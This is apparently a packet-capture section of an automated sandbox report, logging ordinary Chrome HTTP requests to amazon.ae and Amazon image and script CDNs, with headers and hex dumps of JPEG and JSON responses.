                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1528OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.amazon.ae
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                device-memory: 8
                                                                                                                                                                                                                                                                rtt: 150
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-viewport-width: 1280
                                                                                                                                                                                                                                                                sec-ch-device-memory: 8
                                                                                                                                                                                                                                                                viewport-width: 1280
                                                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                dpr: 1
                                                                                                                                                                                                                                                                downlink: 7.65
                                                                                                                                                                                                                                                                sec-ch-dpr: 1
                                                                                                                                                                                                                                                                ect: 4g
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; csm-hit=adb:adblk_no&t:1723469005585
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:28 GMT
                                                                                                                                                                                                                                                                Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                x-amz-rid: 0G22P29SPWWWSV9K33MM
                                                                                                                                                                                                                                                                set-cookie: ubid-acbae=261-1616972-1526733; Domain=.amazon.ae; Expires=Tue, 12-Aug-2025 13:23:28 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                Via: 1.1 e59bea79ab5f15feda92136bc7b74158.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P4
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: bRRn8yt3U5urLmzJZ6_xy6brOZhc5AhMrsDR2HRziOekfje08-M5_A==
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC3199INData Raw: 63 37 38 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 64 65 73 6b 74 6f 70 2d 61 64 2d 63 65 6e 74 65 72 2d 31 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61 67 65 54 79 70 65 25 32 32 25 33 41 25 32 32 47 61 74 65 77 61 79 25 32 32 25 32 43 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32 61
                                                                                                                                                                                                                                                                Data Ascii: c78{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22a
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1699INData Raw: 36 39 63 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 2e 6f 6e 28 20 27 61 3a 70 6f 70 6f 76 65 72 3a 61 6a 61 78 46 61 69 6c 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 77 69 6e 64 6f 77 2e 75 65 20 26 26 20 77 69 6e 64 6f 77 2e 75 65 2e 63 6f 75 6e 74 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 75 65 2e 63 6f 75 6e 74 28 5c 22 61 64 46 65 65 64 62 61 63 6b 3a 64 65 73 6b 74 6f 70 3a 66 65 65 64 62 61 63 6b 46 6f 72 6d 3a 66 61 69 6c 75 72 65 5c 22 2c 20 31 29 3b 5c 6e
                                                                                                                                                                                                                                                                Data Ascii: 69c }\n });\n A.on( 'a:popover:ajaxFail', function() {\n if(window.ue && window.ue.count) {\n window.ue.count(\"adFeedback:desktop:feedbackForm:failure\", 1);\n
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                55192.168.2.449894151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911851_186x116_1X_en_AE._SY116_CB566464918_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 5027
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 7cceed4a-1d1c-4f25-912e-cd8ea8e07642
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 06 Aug 2024 06:38:52 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 02 Aug 2044 12:43:42 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 434385
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:28 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200057-IAD, cache-ewr18172-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0d 15 10 10 0d 10 10 1b 14 0f 14 12 19 10 12 12 19 12 19 19 12 16 19 16 16 1c 19 15 15 19 1c 16 19 1a 26 1a 1f 1b 22 1c 1a 24 1a 26 1a 26 25 25 27 2a 2b 26 19 2a 3a 01 09 09 05 09 09 09 0d 09 09 15 24 19 10 1c 25 1f 0d 1a 2c 25 2b 1c 25 27 25 25 1b 30 25 2b 24 25 16 26 25 1c 22 22 1c 1c 1f 1a 1f 25 1c 27 27 26 10 1b 27 24 19 34 1b 1c 19 25 24 2a 22 19 27 2e ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8f 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 04 07 00 02 03 01 08 10 00 02 01 03 03 02 04 03 06 04 07 00 03 00 00 00 01 02 03 00 04 11 05 12 21 31 41 06 13 22 61 51 71 81 07 14 23 32 91 a1 15 42 72 b1 16 52 53 62 92 c1 d1
                                                                                                                                                                                                                                                                Data Ascii: JFIF&"$&&%%'*+&*:$%,%+%'%%0%+$%&%""%''&'$4%$*"'.t"!1A"aQq#2BrRSb
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: a4 7b be bc 5c a2 8a 0b a8 c8 ac b4 32 e2 56 67 5a 83 a8 4c c1 68 d6 31 3e a0 aa a8 09 ca 40 b5 12 40 2a 21 90 9a e4 19 89 a1 e8 c3 cb 47 c1 c1 8c 47 06 8b 3e 77 37 cc d0 bf 06 4a a9 11 06 98 1d d3 71 e6 b0 33 19 86 43 4d 9c 50 0d 2b 29 78 24 dd c1 a7 ed 0f 5a 10 60 1a ae 90 7a 81 14 fb 61 a4 fd e2 3c 8a db be b4 65 d3 cc 8a 6c 65 6e 49 27 ea da 98 9f 9a d3 4d ba dd 22 e2 96 2f 23 78 1b 6b 51 1d 22 70 92 02 68 62 80 b5 69 65 cd dc ac 05 a3 8e a7 39 09 83 4b 37 57 06 28 5f fd d8 1f f2 20 51 fb d9 d2 74 db de 95 35 95 31 40 9b 79 3b d7 f6 f5 7f d5 76 32 fa 06 76 43 7b 22 1c d1 9a 4d 56 d9 ad 92 42 aa c1 10 e3 b0 92 45 4f fb ab 8e c2 de c9 3c b8 90 86 65 47 c3 0e 02 f0 54 00 3e 18 af 9d fc 37 24 96 ed 24 ae 0b 2a 94 c4 7d 9c 8c b0 07 e5 57 57 84 e6 bc d4 ee
                                                                                                                                                                                                                                                                Data Ascii: {\2VgZLh1>@@*!GG>w7Jq3CMP+)x$Z`za<elenI'M"/#xkQ"phbie9K7W(_ Qt51@y;v2vC{"MVBEO<eGT>7$$*}WW
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: a8 a9 f0 9e e3 4b 82 fe de 4c f0 ff 00 81 92 e6 60 6e 47 a1 01 25 47 57 c7 01 68 17 88 6e 5e 39 ae 0d b0 54 da 16 28 e1 55 0c 37 10 fb 81 53 91 94 43 9e 69 9b 4d f1 05 cc 77 06 2b 68 cc 99 8c ee 1b 82 85 03 24 1e 8d fd d7 a5 20 2b 4b 65 ab dd ac 91 ac a5 65 88 48 13 b1 6c 86 da dd 8a 67 f5 5a b5 6c c5 36 fe e5 1d 40 b3 4b ea 68 74 41 7a b0 c9 76 e1 04 b3 cd eb 38 50 42 47 f4 5e 18 e2 a1 c1 a7 db 24 8e b1 aa 89 55 0f a9 1f 87 5c 8e dc ed 3f 1a 64 b8 fb c3 90 f0 a8 7f bb 3c a8 13 80 0a ed 32 37 c3 24 96 fa d7 0b 3f 27 52 49 99 21 09 2c 69 ea e3 69 e5 94 f3 f0 a6 1a ed 56 77 04 b5 93 60 d4 4e d4 62 b8 86 54 31 ee 04 21 04 83 bb 82 71 51 20 d4 9e 06 75 c9 1c 1c 01 85 c6 7a 8f 6a 99 7d 7e 62 ba 48 fe 31 8f ca fb 73 96 3f 1c 7c 28 44 d9 dd 23 61 99 b0 40 c9 07
                                                                                                                                                                                                                                                                Data Ascii: KL`nG%GWhn^9T(U7SCiMw+h$ +KeeHlgZl6@KhtAzv8PBG^$U\?d<27$?'RI!,iiVw`NbT1!qQ uzj}~bH1s?|(D#a@
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC893INData Raw: 6a 04 23 36 76 30 6d cc bd 09 05 40 e4 12 2a 90 ba d0 6f 3c e8 67 92 65 7f 29 42 aa 97 c3 6d c6 d3 85 e7 1c 1a d3 c7 ea c8 53 56 1f 97 a8 95 bd 31 f9 f2 41 e3 dc 01 1e ab 3d bd d2 b2 cd b4 f9 c7 23 6e 4f e2 0c 1c 9c d5 bd 66 f3 ea 70 9f 38 82 15 50 82 b8 04 93 b8 55 37 7c 6d cb 39 f5 31 d8 3d 58 2a 37 0f 6f cd 52 a1 ba fe 25 6e d6 ca a1 98 28 21 81 ff 00 29 07 a7 bd 39 60 16 57 e3 c4 05 6a 52 d1 23 78 d2 03 6b 7a 57 b8 03 af c9 68 15 86 9e b7 50 09 08 39 2c 6b cd 4a 36 53 1c 6e 0e 54 37 62 7a 91 5c 44 b2 47 1e d8 f7 fc 80 35 74 0d da 55 53 2c fc 45 ac 58 42 29 66 c8 08 07 85 f9 77 a8 97 00 40 54 10 0e 73 92 46 7a 73 ed 5b 44 31 0c 92 4b 2b 06 1d 10 82 28 76 1d fd 6f b8 80 38 24 12 33 44 55 b0 11 b3 04 f6 54 41 0a 21 2b 34 f3 6d dd 80 c1 32 8e 07 b0 34 3a
                                                                                                                                                                                                                                                                Data Ascii: j#6v0m@*o<ge)BmSV1A=#nOfp8PU7|m91=X*7oR%n(!)9`WjR#xkzWhP9,kJ6SnT7bz\DG5tUS,EXB)fw@TsFzs[D1K+(vo8$3DUTA!+4m24:


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                56192.168.2.449896151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911856_186x116_1X_en_AE._SY116_CB566464918_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 5462
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 30929086-f517-4fa2-a8f9-03664a2f44cc
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 06 Aug 2024 06:38:52 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 02 Aug 2044 12:43:43 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 434385
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:28 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200061-IAD, cache-ewr18178-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 08 04 06 07 09 01 03 05 0a 02 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 de 00 e7 f6 c0 01 8b 39 b3 a7 2c 97 7c
                                                                                                                                                                                                                                                                Data Ascii: JFIFt"59,|
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 74 15 77 42 a4 0b a5 85 0a f1 20 c6 8f d2 70 0e 1b 1f fc f9 7f ff c4 00 25 11 00 02 02 01 03 03 05 01 01 00 00 00 00 00 00 00 01 02 00 03 11 10 20 31 04 12 13 14 21 23 32 41 15 30 ff da 00 08 01 02 01 01 08 00 d4 01 c9 23 f4 46 38 e0 33 8f be f7 fc 11 46 72 34 53 dc cc 74 46 c8 da 06 60 42 0f b9 42 4c 54 20 c3 59 cc a0 e4 3e 94 36 4d 83 6a 7d a5 f7 35 55 33 af ad 71 47 94 7a c7 34 2d b3 fa 5e d3 a6 ea 40 56 c8 ea 94 ca ba 9e db ac 58 b6 f7 1c 6c 4e 74 c0 96 0f 8d a3 1c 02 65 05 42 80 b9 9e 3f 93 be 55 ce c4 e7 54 ea 3c c5 eb 67 40 d9 53 5d 42 be 34 a8 72 76 2b 00 7d fc 8b 0d 82 55 5a d6 5d 8d a3 16 36 80 c1 29 fa e7 fc 71 bb ff c4 00 26 11 00 02 01 03 04 01 03 05 00 00 00 00 00 00 00 00 01 02 03 00 04 11 10 12 13 20 21 14 22 32 23 30 31 33 42 ff da 00 08
                                                                                                                                                                                                                                                                Data Ascii: twB p% 1!#2A0#F83Fr4StF`BBLT Y>6Mj}5U3qGz4-^@VXlNteB?UT<g@S]B4rv+}UZ]6)q& !"2#013B
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: c5 2e 71 a2 c6 e0 f1 e8 54 7d 1a 84 f3 d0 53 62 21 ea 38 5d a7 c5 e0 7b 50 60 b4 04 7a 0b 86 12 08 e3 46 7d 96 0d cc 49 1e 24 db bf 76 ee 4e e6 7c a8 f7 b2 7d 4f a7 a9 85 16 59 25 4e 64 05 49 f1 63 61 4f 8f 4f ea f8 72 f8 1f c3 43 c4 0d df e9 74 f7 55 c5 00 f0 3f 67 ac aa 5c ed a7 ac 4f dd ae dd dd 1c 45 97 4e e6 fa fa 36 b8 74 fc 02 c6 9f e7 db e3 1f 08 94 92 82 0a 19 a4 41 eb a8 13 81 b4 dd 94 e8 a0 4f 5a c4 f6 22 0c 24 c9 53 27 53 58 96 98 b7 fc aa ae cc 97 95 86 6d dd d0 e0 c9 8e 08 b1 bb 0d ba 9f 28 1a 95 6f 81 5f 28 0e ec d9 bf 05 7d 37 47 f7 ed f8 16 00 77 ae 92 85 94 f0 ed bd 24 72 f7 29 30 27 6a 01 01 64 ac 32 5c af 52 cc 5a 10 d1 c6 8b c8 f7 8e ab 94 2d 3b 50 f2 74 83 41 30 a3 67 f4 f1 48 18 58 1a 3d 46 3f 01 56 d7 16 a1 fe 0a 2f 68 89 0f 71 8f
                                                                                                                                                                                                                                                                Data Ascii: .qT}Sb!8]{P`zF}I$vN|}OY%NdIcaOOrCtU?g\OEN6tAOZ"$S'SXm(o_(}7Gw$r)0'jd2\RZ-;PtA0gHX=F?V/hq
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1328INData Raw: fc 52 14 87 d3 ec 9d 38 34 88 37 d5 ef 5b 7a de 9b 61 88 8d d4 89 62 b7 c8 fe cd 9a 98 ed 08 9a a8 aa 83 9e 11 35 37 96 dc 29 2e f8 a7 22 1f e6 38 20 40 84 00 1c ba 54 e2 36 e5 0a 64 7f 0f a8 18 9a bf db cc 25 07 d2 05 49 f3 b9 ef fc 65 78 8d cb 03 88 02 ee 30 61 1d 68 7b 84 19 6e b0 07 7c 00 30 ba d0 a2 93 7e e7 04 1b f0 c1 b3 d5 a8 0d 50 00 1d f0 44 6b c4 83 7d 66 04 20 ce 6c 54 dc 6a ab e0 13 ce 9f 58 c4 28 2d c0 c5 12 a2 ec d9 c9 9a 3a f5 4b 50 52 2b a2 6e e9 9a 97 a0 14 eb a1 62 ff 00 8f 4e 1c 81 da 92 03 82 b9 a0 ba f9 c1 a8 22 e9 13 7d 35 0e 8f 9f 93 09 1a 23 96 18 96 11 19 b5 cd 58 00 23 79 8d 21 15 ed f9 31 30 11 b9 a5 44 3e 41 77 f1 ec 70 a1 74 8a 10 28 7d bf 81 51 3e 8e 62 9e f1 f7 81 ba 73 46 76 3b d6 6a c9 89 09 d4 e2 3c e2 69 81 56 81 5d e9
                                                                                                                                                                                                                                                                Data Ascii: R847[zab57)."8 @T6d%Iex0ah{n|0~PDk}f lTjX(-:KPR+nbN"}5#X#y!10D>Awpt(}Q>bsFv;j<iV]


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                57192.168.2.449899151.101.129.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC602OUTGET /images/I/41Qtra7lf+L.js HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                Origin: https://images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                Referer: https://images-eu.ssl-images-amazon.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC714INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 24182
                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 074dc463-f5ac-4338-bff3-f99a3adccec4
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 25 May 2023 15:09:56 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Fri, 27 May 2044 23:45:51 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 891246
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:28 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000031-IAD, cache-ewr18165-EWR
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
